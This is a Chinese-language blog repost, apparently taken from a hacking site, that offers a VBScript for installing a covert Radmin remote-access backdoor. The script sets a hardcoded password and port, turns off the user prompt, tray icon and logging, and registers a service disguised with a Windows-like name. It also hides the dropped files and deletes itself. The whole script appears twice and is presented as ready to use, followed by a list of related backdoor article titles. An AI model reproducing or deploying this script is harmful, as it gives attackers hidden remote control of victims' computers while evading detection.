Vbs脚本实现radmin终极后门
2012-07-16 09:19
441 查看
在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv")
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
uBinary = Array(1,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
uBinary = Array(5,4,0,0) //端口:1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
uBinary = Array(10,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
strValueName = "LogFilePath"
strValue = "c:\logfile.txt"
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0)
oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "ImagePath"
strValue = "c:\windows\system32\Exporer.exe /service"
oreg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("net start WinManageHelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删除
-------
from www.hack58.com
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv")
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
uBinary = Array(1,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
uBinary = Array(5,4,0,0) //端口:1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
uBinary = Array(10,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
strValueName = "LogFilePath"
strValue = "c:\logfile.txt"
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0)
oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "ImagePath"
strValue = "c:\windows\system32\Exporer.exe /service"
oreg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("net start WinManageHelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删除
-------
from www.hack58.com
相关文章推荐
- 利用Vbs脚本实现radmin终极后门
- Vbs脚本实现radmin终极后门
- Vbs脚本实现radmin终极后门
- Vbs脚本实现radmin终极后门代码_删除自身
- vbs脚本实现“多线程”下载
- vbs实现恢复暂停的自动启动服务的脚本
- 利用vbs脚本实现静态路由备份策略
- 用vbs实现zip功能的脚本
- xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs
- C语言获取开机时间(结合VBS脚本实现语音输出)
- 通过vbs脚本实现批处理后台运行vm
- 用vbs实现虚拟主机和域名查循的脚本
- VBS自编写脚本。(实现批量修改文件名且在执行前,备份原有文件夹中的文件)
- 利用计划任务和VBS脚本实现自动WEB共享文件夹里的文件
- vbs脚本 实现下载文件和建立计划任务
- 用vbs实现修改dns的网关脚本
- 利用批处理文件和 vbs 脚本实现网站视频自动录制
- Vbs脚本实现数据CUT备份及自动轮询删除备份数据
- 用vbs实现随机读取文件的一行内容的脚本
- 用vbs实现的瞬间关闭多个系统进程的脚本